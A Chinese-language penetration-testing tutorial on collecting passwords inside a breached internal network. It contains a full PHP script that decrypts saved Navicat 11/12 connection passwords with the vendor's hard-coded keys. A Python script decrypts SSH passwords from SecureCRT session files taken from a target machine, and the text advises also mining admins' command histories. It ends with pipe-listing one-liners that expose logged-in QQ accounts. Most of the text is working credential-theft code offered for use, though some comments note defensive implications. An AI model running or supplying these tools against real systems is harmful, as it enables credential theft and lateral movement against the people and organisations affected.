内网渗透-内网密码信息搜集

0X01 内网密码搜集-Navicat连接密码解密

  • 以 Navicat Premium 12 为例

  • 步骤一:选择文件—->导出连接,勾选想要导出的数据库,导出.ncx后缀的文件


  • 步骤二:复制加密的password,运行如下php脚本。本地没有安装PHP时,可使用在线运行的工具https://tool.lu/coderunner/(注意:贴到第三方在线运行工具的密文,该站点同样可以解出,等于把凭据交给了对方;应尽量在本地或受控环境中运行。)

  • 附 PHP 脚本

    <?php
    namespace FatSmallTools;
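    class NavicatPassword
    {
        // Navicat 11 stores passwords with Blowfish-ECB in a custom chaining
        // mode; Navicat 12 uses AES-128-CBC.  Every key and IV below is a fixed
        // constant, so a password held in an exported .ncx (or the profile it
        // was exported from) is recoverable by anyone who can read that file.
        // Treat such files as plaintext credentials: restrict who can read them,
        // avoid saving passwords in connection profiles where possible, and
        // rotate any credential whose profile may have been copied.
        protected $version = 0;
        protected $aesKey = 'libcckeylibcckey';
        protected $aesIv = 'libcciv libcciv ';
        protected $blowString = '3DC5CA39';
        protected $blowKey = null;
        protected $blowIv = null;

        /**
         * @param int $version Navicat major version, 11 or 12.  Any other value
         *                     makes encrypt() and decrypt() return FALSE.
         */
        public function __construct($version = 12)
        {
            $this->version = $version;
            // The Blowfish key is the raw SHA-1 digest of the fixed seed string;
            // use the field instead of repeating the '3DC5CA39' literal.
            $this->blowKey = sha1($this->blowString, true);
            $this->blowIv = hex2bin('d9c7c3c8870d64bd');
        }

        /**
         * Encrypt a plaintext password with the scheme of the configured version.
         *
         * @param string $string Plaintext password.
         * @return string|false Upper-case hex ciphertext, or FALSE for an
         *                      unsupported version.
         */
        public function encrypt($string)
        {
            switch ($this->version) {
                case 11:
                    return $this->encryptEleven($string);
                case 12:
                    return $this->encryptTwelve($string);
                default:
                    return false;
            }
        }

        /**
         * Navicat 11 scheme: each 8-byte block is XORed with a running vector and
         * passed through Blowfish-ECB; the vector is then XORed with the
         * ciphertext block.  A trailing partial block is XORed with the
         * Blowfish-encrypted vector instead.
         *
         * @param string $string Plaintext password.
         * @return string Upper-case hex ciphertext.
         */
        protected function encryptEleven($string)
        {
            $round = (int) floor(strlen($string) / 8);
            $leftLength = strlen($string) % 8;
            $result = '';
            $currentVector = $this->blowIv;

            for ($i = 0; $i < $round; $i++) {
                $temp = $this->encryptBlock($this->xorBytes(substr($string, 8 * $i, 8), $currentVector));
                $currentVector = $this->xorBytes($currentVector, $temp);
                $result .= $temp;
            }

            if ($leftLength) {
                // Offset is 8 * $round rather than the loop variable: for input
                // shorter than one block the loop never runs and $i is undefined.
                $currentVector = $this->encryptBlock($currentVector);
                $result .= $this->xorBytes(substr($string, 8 * $round, $leftLength), $currentVector);
            }

            return strtoupper(bin2hex($result));
        }

        /**
         * Encrypt one 8-byte block with Blowfish-ECB (no padding).
         *
         * @param string $block Exactly 8 bytes.
         * @return string|false Raw ciphertext block, or FALSE from OpenSSL.
         */
        protected function encryptBlock($block)
        {
            return openssl_encrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
        }

        /**
         * Decrypt one 8-byte block with Blowfish-ECB (no padding).
         *
         * @param string $block Exactly 8 bytes.
         * @return string|false Raw plaintext block, or FALSE from OpenSSL.
         */
        protected function decryptBlock($block)
        {
            return openssl_decrypt($block, 'BF-ECB', $this->blowKey, OPENSSL_RAW_DATA|OPENSSL_NO_PADDING);
        }

        /**
         * Byte-wise XOR of $str1 with the leading bytes of $str2.
         *
         * Iterates over strlen($str1); callers always pass a $str2 at least as
         * long as $str1 (the running vector is 8 bytes, the data block at most 8).
         *
         * @param string $str1
         * @param string $str2
         * @return string Same length as $str1.
         */
        protected function xorBytes($str1, $str2)
        {
            $result = '';
            $length = strlen($str1);
            for ($i = 0; $i < $length; $i++) {
                $result .= chr(ord($str1[$i]) ^ ord($str2[$i]));
            }

            return $result;
        }

        /**
         * Navicat 12 scheme: AES-128-CBC with the fixed key and IV, PKCS#7 padded.
         *
         * @param string $string Plaintext password.
         * @return string Upper-case hex ciphertext.
         */
        protected function encryptTwelve($string)
        {
            $result = openssl_encrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
            return strtoupper(bin2hex($result));
        }

        /**
         * Decrypt a hex ciphertext with the scheme of the configured version.
         *
         * @param string $string Hex ciphertext (case-insensitive).
         * @return string|false Plaintext, or FALSE for an unsupported version
         *                      or malformed input.
         */
        public function decrypt($string)
        {
            switch ($this->version) {
                case 11:
                    return $this->decryptEleven($string);
                case 12:
                    return $this->decryptTwelve($string);
                default:
                    return false;
            }
        }

        /**
         * Inverse of encryptEleven(): the vector is XORed with each ciphertext
         * block after use, and a trailing partial block is XORed with the
         * Blowfish-encrypted vector.
         *
         * @param string $upperString Hex ciphertext.
         * @return string|false Plaintext, or FALSE if $upperString is not hex.
         */
        protected function decryptEleven($upperString)
        {
            $string = $this->decodeHex($upperString);
            if ($string === false) {
                return false;
            }

            $round = (int) floor(strlen($string) / 8);
            $leftLength = strlen($string) % 8;
            $result = '';
            $currentVector = $this->blowIv;

            for ($i = 0; $i < $round; $i++) {
                $encryptedBlock = substr($string, 8 * $i, 8);
                $temp = $this->xorBytes($this->decryptBlock($encryptedBlock), $currentVector);
                $currentVector = $this->xorBytes($currentVector, $encryptedBlock);
                $result .= $temp;
            }

            if ($leftLength) {
                // Same $round-based offset as in encryptEleven(): $i is undefined
                // when there was no full block.
                $currentVector = $this->encryptBlock($currentVector);
                $result .= $this->xorBytes(substr($string, 8 * $round, $leftLength), $currentVector);
            }

            return $result;
        }

        /**
         * Inverse of encryptTwelve().
         *
         * @param string $upperString Hex ciphertext.
         * @return string|false Plaintext, or FALSE if the input is not hex or
         *                      does not decrypt (OpenSSL returns FALSE).
         */
        protected function decryptTwelve($upperString)
        {
            $string = $this->decodeHex($upperString);
            if ($string === false) {
                return false;
            }
            return openssl_decrypt($string, 'AES-128-CBC', $this->aesKey, OPENSSL_RAW_DATA, $this->aesIv);
        }

        /**
         * Convert a hex string to bytes, returning FALSE for malformed input.
         *
         * Validated up front so a bad value copied from a profile yields FALSE
         * instead of the hex2bin() warning plus an empty/garbage result.
         *
         * @param string $hexString Hex digits in either case.
         * @return string|false
         */
        protected function decodeHex($hexString)
        {
            $hexString = strtolower((string) $hexString);
            if (strlen($hexString) % 2 !== 0 || !preg_match('/\A[0-9a-f]*\z/', $hexString)) {
                return false;
            }
            return hex2bin($hexString);
        }
    }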
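    use FatSmallTools\NavicatPassword;

    // Pick the Navicat major version the .ncx was exported from: 11 or 12.
    $navicatPassword = new NavicatPassword(12);
    //$navicatPassword = new NavicatPassword(11);

    // Decrypt the Password value copied from the exported .ncx.  The original
    // line used typographic quotes (“…”) around the label, which PHP rejects
    // as a parse error; they must be plain ASCII double quotes.
    //$decode = $navicatPassword->decrypt('15057D7BA390');
    $decode = "密码:" . $navicatPassword->decrypt('83D95C24B42567332F09503BF701A252');
    echo $decode . "\n";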

0X02 内网密码搜集-MobaXterm终端神器

  • 看图操作

0X03 Win SSH 及 SFTP 客户端密码 hash 解密 SecureCRT < 7.1

### 0x03.1 找到 SecureCRT 配置文件目录下的 Sessions 目录

  • 直接把目标 SecureCRT config 目录下所对应的 session 文件想办法拖回来进行本地解密即可。

  • SecureCRT 的每个 session 文件都会用连接的 ip 或者域名的形式来命名。

  • 解密脚本基于 Python 2.7,需要 pycrypto 库(这些基础环境已提前准备好);再次说明,此处的解密脚本只支持 7.x 系列的解密。

  • py解密脚本:

    #!/usr/bin/env python
    #

    # Decrypt SSHv2 passwords stored in VanDyke SecureCRT session files
    # Can be found on Windows in:
    # %APPDATA%\VanDyke\Config\Sessions\sessionname.ini
    # Tested with version 7.2.6 (build 606) for Windows
    # Eloi Vanderbeken - Synacktiv
    # Decrypt SSHv2 passwords stored in VanDyke SecureCRT

    # C:\>python SecureCRT-decryptpass.py -h
    # usage: SecureCRT-decryptpass.py [-h] files [files ...]
    #
    #Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files
    #
    #positional arguments:
    # files session file(s)
    #
    #optional arguments:
    # -h, --help show this help message and exit
    #
    # C:\>python SecureCRT-decryptpass.py C:\Users\user1\AppData\Roaming\VanDyke\Config\Sessions\192.168.0.1.ini
    # C:\Users\user1\AppData\Roaming\VanDyke\Config\Sessions\192.168.0.1.ini
    # ssh -p 22 user@192.168.0.1 # 123456


    from Crypto.Cipher import Blowfish
    import argparse
    import re

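    def decrypt(password):
        """Recover the plaintext of one SecureCRT-encoded password field.

        `password` is the hex string that follows `S:"Password"=u` in a session
        file.  Both Blowfish keys are hard-coded here rather than derived from
        anything user- or machine-specific, so whoever can read the session
        file can undo this encoding: a saved password is plaintext-equivalent
        and the Sessions directory deserves the same protection.

        Returns the password as a unicode string.
        """
        key1 = '5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ', '').decode('hex')
        key2 = '24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ', '').decode('hex')
        c1 = Blowfish.new(key1, Blowfish.MODE_CBC, '\x00' * 8)
        c2 = Blowfish.new(key2, Blowfish.MODE_CBC, '\x00' * 8)
        # Outer layer (c2) first; its first and last 4 bytes are discarded
        # before the inner layer (c1) is removed.
        padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4])
        # The plaintext is UTF-16 ended by a 2-byte NUL.  Stop at the terminator
        # or at the end of the buffer: the original `while padded[:2] != '\x00\x00'`
        # never ends on input without a terminator, because '' != '\x00\x00'.
        p = ''
        while len(padded) >= 2 and padded[:2] != '\x00\x00':
            p += padded[:2]
            padded = padded[2:]
        return p.decode('UTF-16')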

    # Field patterns for a SecureCRT session .ini (after NUL bytes are stripped).
    # String fields look like S:"Name"=value; the password value is prefixed
    # with 'u' and stored as hex; the [SSH2] Port is a D: field of 8 hex digits.
    REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)')
    # Name kept as in the original (note the single S in PASWORD) for callers.
    REGEX_PASWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)')
    REGEX_PORT = re.compile(ur'D:"\[SSH2\] Port"=([0-9a-f]{8})')
    REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)')

    def hostname(x):
        """Return the Hostname value from session text `x`, or '???' if absent."""
        match = REGEX_HOSTNAME.search(x)
        return match.group(1) if match is not None else '???'

    def password(x):
        """Return the decrypted Password value from session text `x`, or '???' if absent."""
        match = REGEX_PASWORD.search(x)
        if match is None:
            return '???'
        return decrypt(match.group(1))

    def port(x):
        """Return an ssh `-p N ` argument from the [SSH2] Port value of `x`, or '' if absent.

        The file stores the port as hex, hence the base-16 conversion.
        """
        match = REGEX_PORT.search(x)
        if match is None:
            return ''
        return '-p %d ' % int(match.group(1), 16)

    def username(x):
        """Return the Username value of `x` followed by '@', or '' if absent."""
        match = REGEX_USERNAME.search(x)
        return '' if match is None else match.group(1) + '@'

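    parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files')
    parser.add_argument('files', type=argparse.FileType('r'), nargs='+',
                        help='session file(s)')

    args = parser.parse_args()

    for f in args.files:
        # Strip NUL bytes before matching (presumably because the session
        # files are stored as 16-bit text -- confirm against a real file).
        # `with` closes each handle as soon as it is read instead of leaving
        # every argparse-opened file open until the interpreter exits.
        with f:
            c = f.read().replace('\x00', '')
        print f.name
        print "ssh %s%s%s # %s" % (port(c), username(c), hostname(c), password(c))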
  • 除了 ssh 连接账号密码,如果本地还保存的有目标运维平时的命令历史记录,同样也值得关注,里面很可能还会存的有其它的各种账号密码,同样有用

0X04 内网信息搜集-浅谈windows管道

  • 一句话获取电脑已经登录的QQ

    powershell : [System.Text.RegularExpressions.Regex]::Matches([System.IO.Directory]::GetFiles("\\.\\pipe\\"),"QQ_(\d*)_pipe").Groups;
cmd : dir \\.\pipe\\ | findstr "QQ_" | findstr "_pipe"